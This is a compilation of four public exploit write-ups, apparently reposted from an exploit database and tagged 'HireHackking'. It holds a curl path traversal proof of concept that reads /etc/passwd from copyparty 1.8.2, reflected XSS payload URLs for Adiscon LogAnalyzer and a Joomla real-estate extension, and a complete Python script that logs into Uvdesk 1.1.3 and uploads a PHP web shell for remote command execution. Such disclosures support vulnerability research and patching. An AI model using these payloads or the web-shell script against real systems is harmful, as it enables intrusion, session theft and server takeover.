# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474




#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
HireHackking 
# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation method.
If you installed without database(File-Based),No need to login.
If you installed with database, You should login with Read Only User(at least)

XSS Payloads are as below:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
HireHackking 
# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 29/07/2023
# Vendor: The Thinkery LLC
# Vendor Homepage: http://thethinkery.net
# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
# Demo: https://iproperty.thethinkery.net/
# Version: 4.1.1
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /iproperty/property-views/all-properties-with-map

GET parameter 'filter_keyword' is vulnerable to XSS

https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1


XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4


[-] Done
HireHackking 
# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security 
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6


import requests
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args

def main():
    args = get_args()
    base_url = args.url

    command = args.command
    uploaded_file = "shell.php"
    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command

# Edit your credentials here
    login_data = {
        "_username": "admin@adm.com",
        "_password": "passwd",
        "_remember_me": "off"
    }

    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
    }

    s = requests.session()
    # Login
    s.post(base_url + "/en/member/login", data=login_data)
    # Upload
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
    # Execute command
    cmd = s.get(url_cmd)
    print(cmd.text)

if __name__ == "__main__":
    main()